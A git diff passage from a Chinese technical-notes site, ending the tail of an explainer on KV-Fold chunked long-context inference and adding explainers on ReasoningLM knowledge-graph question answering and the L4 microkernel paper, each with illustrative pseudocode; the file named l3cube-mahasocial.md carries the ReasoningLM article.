的**递推状态(recurrent state)**: + +1. 把长序列切成长度为 `C` 的 chunk:`x₀, x₁, …, x_{N-1}`,总长度 `T = N × C`。 +2. 处理 chunk `t` 时,把 chunk `0…t-1` 累积的 KV cache 当作 **prefix**,当前 chunk 的 query 可以 attend 到全部历史 K/V。 +3. forward 结束后,把 chunk `t` 新产生的 K/V **append** 到 cache,**不做 copy 变换、不压缩**,传给 chunk `t+1`。 +4. 新 token 的 **position id 从绝对位置 `t×C` 连续编号**,RoPE 与「一次性读完整序列」对齐。 + +用函数式写法,就是 left fold: + +```text +(K, V) = foldl(F_θ, (∅, ∅), [x₀, x₁, …, x_{N-1}]) +``` + +其中 `F_θ` 是标准 Transformer forward,accumulator 是不断变长的 `(K, V)` cache。 + +论文建立在 **LatentMAS** 等工作提出的「KV cache 拼接 / 跨 pass 当 prefix」原语之上,但用途从多智能体 latent 通信改成了**单模型内的长上下文分块推理**。 + +--- + +## 为什么重要 + +长上下文是 2024–2026 LLM 的主战场,但常见路线各有代价: + +| 路线 | 典型代表 | 优点 | 代价 | +|------|----------|------|------| +| 原生长窗口 | Llama 3.1 128K | 行为与训练一致 | 单次 forward 显存/算力爆炸 | +| 流式 / 滑动窗口 | StreamingLLM | 内存 bounded、快 | 窗口外 token **不可检索** | +| KV 压缩 / 驱逐 | H2O、SnapKV 等 | 省显存 | **有损**,精确召回任务易掉点 | +| 改架构 / 再训练 | RingAttention、YaRN 微调 | 可扩展 | 工程或训练成本高 | + +KV-Fold 占了一个独特位置:**不训练、不压缩、保留完整 KV 历史**,用多次「可承受的 forward」换「单次不可承受的 forward」。论文用 drift 曲线证明递推不是误差雪崩,用 NIAH 证明**任务级精确信息**可跨数百个 chunk 边界保留——说明 frozen pretrained Transformer **已经具备**这种 KV 递推能力,只是以前没人系统把它当长上下文协议来用。 + +--- + +## 核心概念 + +### 1. KV cache 不只是加速技巧 + +Decoder-only 模型自回归生成时,每层会为已见 token 缓存 Key/Value,避免重复计算。KV-Fold 把 cache 重新定义为:**模型过去计算的 structured record**,是可跨 chunk 携带的**状态**,而不只是 serving 优化。 + +### 2. 一步更新(one-step recurrence) + +每个 chunk 边界只做**一次**标准 forward + append,chunk 内部不再迭代。这与 REFORM、LESS 等「chunk 内多轮 / 压缩后再递推」不同——KV-Fold 刻意保持极简。 + +Attention 在 layer ℓ 上形如: + +```text +Q_t^(ℓ) 来自当前 chunk 的新 token +K_{0:t}^(ℓ) = [K_0^(ℓ); K_1^(ℓ); …; K_{t-1}^(ℓ); K_t^(ℓ)] // 沿序列维拼接 +V_{0:t}^(ℓ) 同理 +``` + +chunk `t-1` 的 K/V **原样**作为 prefix 进入 chunk `t`,边界处 **continuous position IDs** 至关重要。 + +### 3. Drift 与平台期(plateau) + +论文定义三种对照: + +- **full**:单次全上下文 forward 的 NLL(上界) +- **isolated**:每个 chunk 单独 forward、无 prefix(下界) +- **kv-fold**:带累积 KV prefix 的 NLL + +**Drift** = `NLL_kv-fold − NLL_full`:相对「理想全注意力」偏了多少。 +**Recurrence advantage** = `NLL_isolated − NLL_kv-fold`:递推比孤立 chunk 好多少。 + +实验(Qwen2.5-7B,T=16K,C=256):drift 在前 ~7 个 chunk 边界上升,之后 **~0.04 nats 平台期** 维持到 depth 63;advantage 全程为正。把精度从 bf16 提到 fp32(约 10000×),平台 drift 只降 **2.8%**——说明主要是**结构性** attention regime 偏移,不是舍入误差累积。 + +### 4. 与 StreamingLLM 的权衡 + +| 指标 | KV-Fold @ 128K | StreamingLLM @ 128K | +|------|----------------|------------------------| +| Peak GPU 内存 | ~35.6 GB(线性增长) | ~16.6 GB(固定 ~1024 cache) | +| NIAH 检索 | 100%(needle 可在任意深度) | 0%(needle 滑出窗口后) | +| wall-clock | ~171 s(Llama-3.1-8B) | 更快,但丢远程事实 | + +**多出来的内存买的是完整检索能力**,不是 perplexity alone。 + +### 5. Needle-in-a-haystack 协议(任务级验证) + +1. 从 PG-19 采样 16K+ token 长文作 haystack。 +2. 插入句子:`The magic number for [key] is [value].`(key 为罕见词,value 为 5 位数字)。 +3. 控制 needle 与最终问题之间的 **chain depth** `d`(chunk 边界数)。 +4. 问:`Earlier in the document, what was the magic number associated with [key]?` +5. 贪婪解码 30 token,抽取第一个 5 位数与 gold 比对。 + +KV-Fold 在 Qwen2.5-7B 上 d∈{1,15,31,62} 各 20 次 trial **80/80**;Llama-3.1-8B 扩到 T=128K、depth 511 仍 **152/152**。 + +--- + +## 代码示例 1:最小 KV-Fold 推理循环(伪代码) + +下面用接近 PyTorch / HuggingFace 的伪代码展示协议本身——**核心就是 prefix cache + 连续 position + concat**: + +```python +def kv_fold_prefill(model, token_ids: list[int], chunk_size: int = 256): + """ + 将长 prompt 按 KV-Fold 协议预填充,返回最终 past_key_values 供 decode 使用。 + token_ids: 完整长上下文 + chunk_size: 每个 chunk 的 token 数 C + """ + past_kv = None # accumulator: 各层 (K, V),初始为空 + abs_pos = 0 # 全局绝对位置,供 RoPE / position_ids + + for start in range(0, len(token_ids), chunk_size): + chunk = token_ids[start : start + chunk_size] + position_ids = list(range(abs_pos, abs_pos + len(chunk))) + + # 关键:past_key_values 作为 prefix;新 chunk 的 Q 可 attend 全部历史 K/V + outputs = model.forward( + input_ids=chunk, + position_ids=position_ids, + past_key_values=past_kv, + use_cache=True, + ) + + # 一步更新:append 本 chunk 产生的 K/V(框架通常已在 past 里 concat 好) + past_kv = outputs.past_key_values + abs_pos += len(chunk) + + return past_kv + + +def generate_after_kv_fold(model, past_kv, question_ids: list[int]): + """Haystack 读完后的短问题可以照常 autoregressive 生成。""" + return model.generate( + input_ids=question_ids, + past_key_values=past_kv, + max_new_tokens=30, + do_sample=False, # 论文 NIAH 用 greedy + ) +``` + +实现时务必确认三点: + +1. **position_ids 跨 chunk 连续**,不能每个 chunk 从 0 重计。 +2. **prefix K/V 不做额外投影或压缩**(与 LatentMAS Eq.4 一致)。 +3. 框架的 `past_key_values` 语义是「当前 forward 之前已存在的 KV」;不同版本 API 字段名可能不同(`cache_position` 等),但逻辑不变。 + +--- + +## 代码示例 2:用 `foldl` 理解递推 + 简单 drift 监控 + +第二个例子从函数式视角写递推,并演示如何像论文一样监控 **per-depth drift**(需要偶尔跑 full baseline 作对照): + +```python +from dataclasses import dataclass +from typing import Any, Callable, Iterable, Optional + +Chunk = list[int] +KVCache = Any # 每层 (key, value) 的 tuple 列表 + + +@dataclass +class FoldState: + kv: Optional[KVCache] + depth: int = 0 + + +def foldl_chunks( + chunks: Iterable[Chunk], + step_fn: Callable[[FoldState, Chunk], FoldState], + init: FoldState, +) -> FoldState: + """与论文 Eq.(2) 同构的 left fold。""" + acc = init + for x_t in chunks: + acc = step_fn(acc, x_t) + acc.depth += 1 + return acc + + +def make_step(model, nll_fn) -> Callable[[FoldState, Chunk], FoldState]: + def step(acc: FoldState, chunk: Chunk) -> FoldState: + pos = acc.depth * len(chunk) # 简化:等长 chunk;不等长时用 running offset + out = model.forward(chunk, past_key_values=acc.kv, position_offset=pos) + return FoldState(kv=out.past_key_values, depth=acc.depth) + return step + + +def per_depth_drift(model, full_ids: list[int], chunk_size: int) -> list[float]: + """ + drift(d) = NLL_kv_fold(d) - NLL_full(d) + 论文在 PG-19 上对每个 chunk 边界算 marginal NLL;这里示意结构。 + """ + chunks = [ + full_ids[i : i + chunk_size] + for i in range(0, len(full_ids), chunk_size) + ] + drifts = [] + + for d, _ in enumerate(chunks): + # full baseline:同一窗口内单次 forward(仅当 T 能放进显存时可行) + nll_full = model.nll_at_chunk_boundary(full_ids, chunk_index=d, mode="full") + + # kv-fold:只 fold 到第 d 个 chunk + state = foldl_chunks( + chunks[: d + 1], + make_step(model, None), + FoldState(kv=None, depth=0), + ) + nll_fold = model.nll_at_chunk_boundary(full_ids, chunk_index=d, past_kv=state.kv) + + drifts.append(nll_fold - nll_full) + + return drifts + + +# 预期形状(与论文 Fig.3 一致): +# drifts[:7] 可能缓慢上升 +# drifts[7:] 进入平台,总变化 ~ O(1e-4) nats 量级 +``` + +这段代码不能直接跑通所有 HF 模型(`nll_at_chunk_boundary` 需按实现补齐),但抓住了论文的**评估骨架**:不是只看最终 loss,而是看 **chain depth 上的 drift 曲线是否饱和**。 + +--- + +## 算法流程(一图胜千言) + +```text +初始: K,V = 空 + +对于 t = 0 .. N-1: + ┌─────────────────────────────────────────────┐ + │ Forward chunk x_t │ + │ · position_ids = [tC, tC+1, …, (t+1)C-1] │ + │ · prefix = (K_{0:t-1}, V_{0:t-1}) │ + │ · 计算 Q_t, attend 到 K_{0:t}, V_{0:t} │ + └─────────────────────────────────────────────┘ + │ + ▼ + Append K_t, V_t → 累积 cache + │ + ▼ + 传给 chunk t+1(无压缩) + +全部 chunk 处理完后: + 用最终 past_key_values + 短问题 prompt → generate +``` + +--- + +## 实验结果速览 + +**稳定性(Qwen2.5-7B-Instruct,T=16K,C=256)** + +- Drift 在 depth≈7 饱和,depth 15→60 总变化 −0.0003 nats。 +- Recurrence advantage 从 +0.33 到 +0.45 nats,全程为正。 +- 跨 OLMoE / Qwen2.5 / Llama-3.1 三族,**定性模式相同**。 + +**检索(Llama-3.1-8B-Instruct)** + +- T ∈ {32K, 64K, 96K, 128K},chain depth 最高 **511**。 +- **152/152** exact-match;peak memory @128K ≈ 35.6 GB / 40 GB A100。 +- 对比 StreamingLLM:needle 一旦离开 1024 token 窗口,检索 **0%**。 + +**精度消融** + +- bf16 平台 drift 0.0647 vs fp32 0.0629 nats。 +- Chunk size C ∈ {128,256,512,1024},平台 drift 变化 <9%,无单调依赖。 + +--- + +## 适用 vs 不适用 + +**适合 KV-Fold 的场景** + +- 需要在 **不改权重** 的前提下,把现有 8B 级模型推到 **64K–128K** 级 document QA、日志审计、代码库扫描。 +- 任务要求 **精确召回** 早期事实(合同条款号、magic number、CVE id),不能接受 StreamingLLM 式窗口外丢失。 +- 硬件有 **线性增长的 KV 显存预算**(例如 40GB 单卡可换 128K×8B 量级)。 +- 可以接受 **多次 forward 的 wall-clock**(128K 约 171s 量级),而非单次 ultra-fast prefill。 + +**不太适合的场景** + +- **显存硬上限** 且无法线性扩容:cache 随 T 线性增长,没有 bounded-memory 保证。 +- 需要与 **full-attention 逐 token 完全一致** 的生成分布:存在 ~0.04–0.12 nats 级 plateau drift(检索仍 100%,但 open-ended 生成可能有细微差异)。 +- 超长上下文 **远超训练 RoPE 范围** 且未做位置外推:论文刻意在 Llama 3.1 **原生 128K 内**测试,避免 OOD 因素。 +- 极低延迟在线服务:Streaming / 压缩 KV 通常更快。 + +--- + +## 与相关工作的关系 + +- **LatentMAS(KV 拼接原语)**:多 agent 之间传 KV;KV-Fold 是**单模型、单任务**的长上下文 fold。 +- **StreamingLLM**:bounded memory,牺牲远程检索;KV-Fold 反方向 trade-off。 +- **REFORM / LESS / 级联 KV**:也做 chunk + cache,但常含 **压缩、重算、跨层 embedding**;KV-Fold **拒绝压缩**。 +- **RingAttention / 序列并行**:解决单次 forward 的算力分布;KV-Fold 是 **推理协议**,可 orthogonal 组合。 + +--- + +## 局限与开放问题 + +论文自述:对 plateau 的解释是 **descriptive**,未证明 fold 动力学收敛或刻画 fixed point。 +未给出生产级开源实现(截至笔记写作时以 arXiv 2605.12471 为准)。 +Drift 存在但 NIAH 仍 100%——对 **开放式长文摘要、多跳推理** 的影响需更多 benchmark。 +Cache 线性增长 → 更长上下文(1M+)仍需与 **KV 量化、offload、稀疏 attention** 等组合。 + +--- + +## 自测题 + +1. KV-Fold 的 accumulator 是什么?与 RNN hidden state 有何异同? +2. 为什么 position id 必须跨 chunk 连续?若每个 chunk 从 0 重计会怎样? +3. 解释 drift plateau:为何不是「误差随 depth 线性累积」? +4. 在 40GB 卡上,KV-Fold vs StreamingLLM,你如何选择? +5. `foldl(F_θ, (∅,∅), chunks)` 中,若把 append 改成 top-k 驱逐,协议还叫 KV-Fold 吗? + +
+参考答案(先自己想再点开) + +1. Accumulator 是各层拼接的 KV cache;RNN hidden 固定维且通常有损压缩,KV-Fold state 随序列线性增长、保留 token 级 addressable 表示。 +2. RoPE 依赖绝对位置;重计会破坏与训练时「长序列一次编码」的位置对齐,attention 模式错位。 +3. 前几步切换到 slightly shifted attention regime 后,同一 `F_θ` 再应用不再显著改变预测;fp32 消融支持「结构性」而非纯数值累积。 +4. 要 exact retrieval / 合规审计 → KV-Fold;要 bounded memory、只关心局部上下文 → Streaming;显存介于两者之间可考虑压缩 KV 方法。 +5. 不算;KV-Fold 定义包含 **无压缩、原样 concat** 的 one-step update。 + +
+ +--- + +## 延伸阅读 + +- 论文:[arXiv:2605.12471](https://arxiv.org/abs/2605.12471)(HTML 版便于读 Fig.1–3) +- 前置原语:LatentMAS — KV cache 作为跨 pass prefix +- 对照基线:StreamingLLM(bounded cache + attention sinks) +- 评估数据:PG-19 长文、needle-in-a-haystack / RULER 类长上下文探针 + +--- + +## 一句话总结 + +**KV-Fold 把 KV cache 当成 `foldl` 的 accumulator:chunk 间原样拼接、位置连续、不训练不压缩——用线性显存和多次 forward,换 frozen Transformer 在 128K 级上下文上的稳定递推与精确远程检索。** diff --git a/src/content/docs/papers/kvm-2007.md b/src/content/docs/papers/kvm-2007.md index b8d18a5cf..e3586be10 100644 --- a/src/content/docs/papers/kvm-2007.md +++ b/src/content/docs/papers/kvm-2007.md @@ -157,6 +157,7 @@ AWS 的 Firecracker(2018)是"砍到极致的 KVM 用户态": - [[esx-memory-2002]] —— ESX Memory 2002 — 让一台机器假装比自己更大的四个魔术 - [[firecracker-2020]] —— Firecracker 2020 — 给 serverless 量身定做的极简 microVM - [[haven-2014]] —— Haven — 把整个应用装进 CPU 黑盒,让云服务商也看不见 +- [[mach-rashid-1986]] —— Mach 1986 — 给 UNIX 换一块能跨机器生长的内核地基 - [[mach-vm-1987]] —— Mach VM — 把虚拟内存抽象成"对象",与硬件解耦 - [[soltesz-2007]] —— Soltesz 2007 — 容器:比虚拟机轻一档的隔离方案 - [[xen-2003]] —— Xen 2003 — 让操作系统配合虚拟化,性能直接接近原生 diff --git a/src/content/docs/papers/l3cube-mahasocial.md b/src/content/docs/papers/l3cube-mahasocial.md new file mode 100644 index 000000000..76bff128f --- /dev/null +++ b/src/content/docs/papers/l3cube-mahasocial.md @@ -0,0 +1,333 @@ +--- +title: ReasoningLM: Enabling Structural Subgraph Reasoning in Pre-trained Language Models for Question Answering over Knowledge Graph +来源: https://arxiv.org/abs/2401.00158 +日期: 2026-06-13 +分类: 其他 +子分类: 知识图谱 +provenance: pipeline-v3 +--- + +# ReasoningLM:让语言模型直接"看懂"知识图谱的推理路径 + +## 一、从日常场景说起:图书馆找书 + +假设你在一个巨大的图书馆(这就是知识图谱)里找一本书。图书馆没有分类目录系统,但每个书架上都贴着标签,告诉你"这本书讲了什么"、"作者是谁"、"引用了哪些其他书"。 + +传统做法是请两个人合作: + +- **语言专家**(语言模型 PLM)负责读懂你的问题:"我想找讲量子计算的书" +- **地图专家**(图神经网络 GNN)负责在图书馆里走,沿着标签路径找到相关的书 + +两个人各自厉害,但沟通效率很低——语言专家看不懂地图专家的笔记格式,地图专家也听不懂语言专家的口头描述。这就是现有 KGQA(知识图谱问答)系统的问题:PLM 和 GNN 两个模块架构不同,知识共享困难。 + +ReasoningLM 的思路很直接:**为什么不培养一个既能读懂问题、又能直接在图书馆里走路径的全能型人才?** + +这就是 ReasoningLM 要做的事——让一个预训练语言模型自己学会知识图谱的子图推理。 + +## 二、核心概念:知识图谱问答(KGQA) + +知识图谱长这样:一堆"实体-关系-实体"的三元组,像这样: + +``` +(周杰伦, 毕业于, 台大音乐系) +(台大音乐系, 隶属于, 台湾大学) +(台湾大学, 位于, 台北) +``` + +KGQA 就是:给你一个自然语言问题,从图谱中找到正确答案。 + +比如问题:"周杰伦毕业于哪所大学?" + +推理路径是: +``` +周杰伦 -> 毕业于 -> 台大音乐系 -> 隶属于 -> 台湾大学(答案) +``` + +这是一条 2 跳(2-hop)的推理路径。问题越复杂,路径越长,从 3 跳到 4 跳都很常见。 + +## 三、ReasoningLM 的三个核心创新 + +### 3.1 子图感知自注意力机制(Subgraph-aware Self-attention) + +这是整个论文最核心的想法。 + +标准的 Transformer 自注意力机制中,每个 token 可以和序列中**任何**其他 token 交互。但在知识图谱推理中,只有图谱中有连接关系的实体/关系才应该互相影响。 + +ReasoningLM 的做法:给自注意力加一个"结构掩码"。 + +```python +def subgraph_masked_attention(Q, K, V, subgraph_edges): + """ + Q, K, V: 标准自注意力的查询、键、值矩阵,形状 (seq_len, d_model) + subgraph_edges: 子图中实际存在的边集合,比如 {(0,1), (1,2), (2,3)} + + 返回: 加了结构约束的注意力输出 + """ + seq_len = Q.shape[0] + + # 步骤1:计算标准注意力分数 + attention_scores = torch.matmul(Q, K.transpose(-2, -1)) / (d_model ** 0.5) + + # 步骤2:构建结构掩码矩阵 + mask = torch.full((seq_len, seq_len), float('-inf')) + + for i in range(seq_len): + for j in range(seq_len): + # 如果两个 token 在子图中是同一条边上的邻居,允许注意力 + # 如果两个 token 都在问题文本中(都是 question tokens),允许注意力 + if (i, j) in subgraph_edges or (j, i) in subgraph_edges: + mask[i, j] = 0.0 # 正常注意力分数 + elif is_question_token(i) and is_question_token(j): + mask[i, j] = 0.0 # 问题内部的 token 可以自由交互 + # 其他情况保持 -inf,softmax 后变成 0 + + # 步骤3:加掩码后做 softmax + masked_scores = attention_scores + mask # -inf 的位置变成 -inf + attention_weights = torch.softmax(masked_scores, dim=-1) + + # 步骤4:加权求和 + output = torch.matmul(attention_weights, V) + + return output +``` + +**类比**:这就像在图书馆里,你只能"看到"和你当前位置有标签路径相连的那些书架,其他书架对你来说是完全"透明"不存在的。 + +数学上,原始注意力矩阵 A 加上掩码矩阵 M: + +``` +Attn(Q, K, V) = softmax(A + M) · V +``` + +M 中,不允许交互的位置是 -inf,softmax 后对应权重变为 0。 + +### 3.2 输入格式设计 + +ReasoningLM 把问题和子图拼成一条统一的序列: + +``` +[CLS] [问题文本] [SEP] [实体1] [关系1] [实体2] [关系2] [实体3] ... [SEP] [候选答案实体列表] +``` + +比如: + +``` +[CLS] 周杰伦毕业于哪所大学 [SEP] 周杰伦 毕业于 台大音乐系 隶属于 台湾大学 [SEP] 台湾大学 台大 台大医学院 ... +``` + +这样,语言模型既能理解问题语义,又能在一个序列里看到完整的子图结构。 + +### 3.3 适配微调(Adaptation Tuning) + +光有结构还不够,模型需要"学习"怎么用这种输入格式。ReasoningLM 用了两阶段训练: + +**第一阶段:适配微调**——用 20,000 个自动合成的数据让模型适应子图推理格式 + +数据来源是 Wikidata,具体做法: + +1. 从热门实体出发,在图谱上随机游走,走不超过 4 跳,终点就是答案 +2. 以起点实体为中心,抽取包含这条推理路径的子图 +3. 用两种方法生成问题:规则模板 + ChatGPT 合成(约 15 美元,获得 20,000 条多样化问题) + +```python +import random + +def generate_training_data(wikidata_kg, num_samples=20000): + """ + 模拟 ReasoningLM 的训练数据生成流程 + + wikidata_kg: 知识图谱,结构为 dict: {实体: [(关系, 相邻实体), ...]} + """ + training_data = [] + + # 1. 选择热门实体作为起点(主题实体) + topic_entities = get_popular_entities(wikidata_kg) + + for _ in range(num_samples): + # 2. 随机选一个起点 + start_entity = random.choice(topic_entities) + + # 3. 从起点随机游走,最多 4 跳 + reasoning_path = [start_entity] + current = start_entity + for hop in range(random.randint(1, 4)): + neighbors = wikidata_kg.get(current, []) + if not neighbors: + break + relation, next_entity = random.choice(neighbors) + reasoning_path.append(next_entity) + current = next_entity + + # 4. 终点就是答案 + answer_entity = reasoning_path[-1] + + # 5. 围绕起点抽取子图,确保推理路径上的节点和关系都被包含 + subgraph = extract_subgraph(wikidata_kg, start_entity, include_path=reasoning_path) + + # 6. 用规则或 ChatGPT 生成问题 + question = synthesize_question(start_entity, reasoning_path) + + # 7. 组装训练样本 + training_data.append({ + "question": question, # "周杰伦毕业于哪所大学?" + "subgraph": subgraph, # 子图三元组列表 + "topic_entity": start_entity, # "周杰伦" + "reasoning_path": reasoning_path, + "answer_entity": answer_entity, # "台湾大学" + }) + + return training_data +``` + +**第二阶段:参数高效微调(PET)**——在下游任务上,只微调 Adapter 参数,冻结其他参数 + +- **子图检索子任务**:让模型学会判断问题和哪些关系相关,逐步扩展子图 +- **答案推理子任务**:在已检索的子图上,预测哪个实体是答案 + +答案预测的-loss 用 KL 散度: + +``` +L_at = D_KL(s || s*) +``` + +其中 s 是模型对每个实体的得分概率分布,s* 是真实答案的 one-hot 分布。只计算实体的 loss,关系和问题词不算。 + +## 四、完整示例:从问题到答案 + +下面是一个完整的推理流程模拟: + +```python +class ReasoningLM: + """ + ReasoningLM 简化实现 + + 核心思想:把知识图谱的子图和问题合并成一条序列, + 用结构感知的自注意力让模型在理解问题的同时进行图谱推理。 + """ + + def __init__(self, plm_model, max_seq_len=512): + self.plm = plm_model + self.max_seq_len = max_seq_len + self.adapter = Adapter() # 轻量级 Adapter,下游微调时用 + + def build_input_sequence(self, question, subgraph, candidate_entities): + """ + 构建统一输入序列 + + Args: + question: 自然语言问题,如 "周杰伦毕业于哪所大学?" + subgraph: 子图三元组列表,如 [("周杰伦", "毕业于", "台大音乐系"), ...] + candidate_entities: 候选答案实体列表 + + Returns: + 构建好的输入序列字符串 + """ + parts = ["[CLS]"] + + # 添加问题 + parts.append(question) + parts.append("[SEP]") + + # 添加子图三元组,按顺序拼接 + for head, relation, tail in subgraph: + parts.append(head) + parts.append(relation) + parts.append(tail) + parts.append("[SEP]") + + # 添加候选答案实体 + for entity in candidate_entities: + parts.append(entity) + + return " ".join(parts) + + def subgraph_masked_attention(self, hidden_states, subgraph_edges, question_mask): + """ + 子图感知自注意力 + + Args: + hidden_states: 输入嵌入,形状 (seq_len, d_model) + subgraph_edges: 子图中的边集合,如 {0,1}, {1,2}, ... + question_mask: 问题部分 token 的布尔掩码 + + Returns: + 结构约束后的隐藏状态 + """ + seq_len = hidden_states.shape[0] + d_model = hidden_states.shape[-1] + + # 计算注意力分数 + Q = hidden_states @ self.W_Q + K = hidden_states @ self.W_K + V = hidden_states @ self.W_V + + scores = torch.matmul(Q, K.transpose(-2, -1)) / (d_model ** 0.5) + + # 构建掩码:只有子图中有边的位置 + 问题内部可以交互 + mask = torch.full((seq_len, seq_len), float('-inf')) + + for i in range(seq_len): + for j in range(seq_len): + # 子图中的边 + if (i, j) in subgraph_edges or (j, i) in subgraph_edges: + mask[i, j] = 0.0 + # 问题内部的 token 可以互相注意力 + elif question_mask[i] and question_mask[j]: + mask[i, j] = 0.0 + + # 加掩码并 softmax + masked_scores = scores + mask + attn_weights = torch.softmax(masked_scores, dim=-1) + + return torch.matmul(attn_weights, V) + + def predict_answer(self, question, subgraph, candidate_entities): + """ + 端到端答案预测 + + Args: + question: 自然语言问题 + subgraph: 子图三元组列表 + candidate_entities: 候选答案实体列表 + + Returns: + 每个候选实体的答案得分概率 + """ + # 第1步:构建输入序列 + input_seq = self.build_input_sequence(question, subgraph, candidate_entities) + + # 第2步:通过 PLM + 自适应注意力 + # (实际实现中会调用 PLM 的 forward,并在每一层插入 masked attention) + hidden_states = self.plm(input_seq) # (seq_len, d_model) + + # 第3步:取 [CLS] 位置的隐藏状态,通过线性层 + softmax 得到答案概率 + cls_state = hidden_states[0] # [CLS] token 的表示 + logits = self.prediction_head(cls_state) + scores = torch.softmax(logits, dim=-1) + + return scores +``` + +## 五、为什么这个方法有效? + +用第一性原理来想: + +1. **问题本质**:KGQA 需要同时做两件事——理解自然语言语义 + 在图谱上做多跳推理。现有方法用两个模块各做一半,但模块间的信息传递是有损的。 + +2. **直觉**:如果让同一个模型同时做这两件事,用结构化的注意力机制"引导"模型只看图谱中有意义的连接,模型就能在同一个表征空间里把语义和结构信息深度融合。 + +3. **结果**:实验显示 ReasoningLM 在多个基准测试(WebQSP、CWQ、MQA)上超越了当时的 SOTA,而且用的参数量更少、训练数据更少。 + +## 六、关键数字 + +- 适配微调数据:**20,000** 个子图 + 合成问题 +- 合成成本:约 **15 美元**(用 ChatGPT) +- 推理路径长度:最多 **4 跳** +- 发表会议:**EMNLP 2023 Main** +- 代码开源:https://github.com/RUCAIBox/ReasoningLM + +## 七、总结 + +ReasoningLM 的核心贡献可以浓缩成一句话:**用结构感知的自注意力机制,让一个预训练语言模型直接学会知识图谱的子图推理,不再需要外挂 GNN 模块。** + +它解决的根本问题是:当我们需要模型同时理解语义和结构时,分开建模往往不如统一建模效果好。这个思路也影响了后来很多工作。 diff --git a/src/content/docs/papers/l4-microkernel-1995.md b/src/content/docs/papers/l4-microkernel-1995.md new file mode 100644 index 000000000..c3b8362d9 --- /dev/null +++ b/src/content/docs/papers/l4-microkernel-1995.md @@ -0,0 +1,232 @@ +--- +title: On Micro-Kernel Construction (L4) — 微内核该怎么「造」 +来源: https://os.itec.kit.edu/downloads/sosp95-mkernel-construction.pdf +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一栋**大型联合办公楼**: + +- **宏内核**(传统 Linux、早期 UNIX)像一家什么都自己干的物业总控:保安、保洁、快递、会议室预订、网络运维、门禁发卡全挤在一间值班室。楼里任何小事都要敲总控室的门;门一开一关本身就很贵,值班室人越多,互相挡路越严重。 +- **微内核**的思路是:值班室只保留**绝对少不了**的几件事——谁能在哪块区域活动、怎么把纸条递给隔壁工位、CPU 时间怎么轮转。文件系统、网络栈、设备驱动全部交给楼里的**独立服务商**(用户态 server),各管各的,崩了一个不至于拖垮整栋楼。 + +到 1995 年,微内核已经折腾了二十多年(Brinch Hansen、HYDRA、CMU Mach……),但口碑很差。大家普遍相信: + +1. 微内核**天生慢**——用户态和内核态来回切、地址空间来回换,IPC 开销大。 +2. 微内核**不够灵活**——接口太瘦,复杂系统还是得把功能塞回内核。 + +Jochen Liedtke 在 SOSP '95 发表的 *On Micro-Kernel Construction*,正是对着这两句「常识」下刀。论文不只是一份 L4 说明书,更是一份**微内核概念清单 + 性能辩护书 + 可移植性反论**:慢不是微内核思想的罪,而是 Mach 等实现**内核塞太满、写太糙**的罪。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 作者 | Jochen Liedtke(GMD,德国国家信息技术研究中心) | +| 场合 | SOSP '95,Copper Mountain Resort, Colorado | +| 页码 | 237–250 | +| DOI | [10.1145/224056.224075](https://doi.org/10.1145/224056.224075) | +| 前身 | L3 微内核(1993 年已展示比 Mach 快一个数量级的 IPC) | +| 核心论点 | 低效与僵化来自**过载的内核**和**不当实现**,而非微内核范式本身 | + +论文结构: + +1. **§2 概念**:从功能需求推导最小原语(地址空间、线程、IPC、唯一 ID) +2. **§3 灵活性**:分页、驱动、Unix 仿真、多媒体分配都可用户态堆叠 +3. **§4 性能**:拆解 kernel-user 切换、地址空间切换、IPC 的周期账 +4. **§5 可移植性**:微内核**本身不该**无脑跨 CPU 移植,但整系统因 server 可移植而更易迁移 + +## 为什么值得读 + +| 今天的现象 | 与这篇论文的关系 | +|------------|------------------| +| seL4 形式化验证 | 最小 TCB 来自本文的最小性原则 | +| Tanenbaum vs Linus 论战 | Liedtke 用 L4 数据反驳「微内核必然慢」 | +| macOS XNU 的 `mach_msg` | Mach 消息遗产;L4 是「Mach 太慢」后的极简矫正 | +| Fuchsia Zircon、QNX | 同谱系:消息 + 能力 + 用户态驱动 | +| L4Linux ~5% 性能损失 vs MkLinux 数倍惩罚 | 根子在 µ-kernel 路径是否够短 | + +## 核心概念一:最小性原则 + +> 一个概念只有在其**移出内核、允许竞争实现**会导致**无法实现系统必需功能**时,才允许留在 µ-kernel 里。 + +系统假设:页式虚存 + 需要保护(不可信/交互式应用)。由此推出两条安全原则: + +- **独立性**:子系统 S 能给保证,不被其它子系统 S' 干扰或破坏 +- **完整性**:S₁ 能与 S₂ 建立**不被 S' 窃听或篡改**的通信通道 + +**必须留在内核的**(论文 §2): + +| 机制 | 理由 | +|------|------| +| Grant / Map / Flush | 在保护边界内递归构造地址空间 | +| 线程 | 换地址空间必须由内核仲裁 | +| 同步 IPC | 跨空间通信 + Grant/Map 的「对方同意」 | +| 唯一 UID | 本地通信指定目标并验证来源 | + +**刻意移出的**:通用分页策略、文件系统、调度细节、设备驱动逻辑、Unix 系统调用表。 + +## 核心概念二:地址空间三原语 + +启动时存在特殊地址空间 **σ₀**(近似物理内存),由 S₀ 控制;其它空间起初为空,靠三原语「长出来」: + +| 原语 | 行为 | 日常类比 | +|------|------|----------| +| **Grant** | 页从授予方**移除**,进入接收方(双方同意) | 把办公室钥匙交给下家,自己不再能进 | +| **Map** | 页同时出现在双方(双方同意) | 同一房间加一把锁,两家都能用 | +| **Flush** | 页在发起方仍可见,撤销所有经自己转手的下游映射 | 房东收回转租副本,自己房间不动 | + +约束:Grant/Map 只能操作**自己已能访问**的页;Flush 不需逐家同意,因接收时已隐含接受「可能被 flush」。 + +I/O 端口也可视作特殊「页」——**设备权限**交给用户态 memory manager,而非写死在特权驱动路径。 + +### 代码示例 1:地址空间原语(教学伪代码) + +```c +typedef struct { + PageDesc table[VIRTUAL_PAGES]; +} AddressSpace; + +int map_page(AddressSpace *mapper, vpage_t v_src, + AddressSpace *recipient, vpage_t v_dst, + AccessRights rights) { + if (!page_accessible(mapper, v_src)) return -EPERM; + if (!recipient_accepts(recipient, v_dst, rights)) return -EAGAIN; + return install_mapping(recipient, v_dst, resolve(mapper, v_src), rights); +} + +int grant_page(AddressSpace *granter, vpage_t v_src, + AddressSpace *grantee, vpage_t v_dst) { + if (!page_accessible(granter, v_src)) return -EPERM; + if (!grantee_accepts(grantee, v_dst)) return -EAGAIN; + PageFrame pf = detach(granter, v_src); + return attach(grantee, v_dst, pf); +} + +int flush_page(AddressSpace *owner, vpage_t v) { + if (!page_owned(owner, v)) return 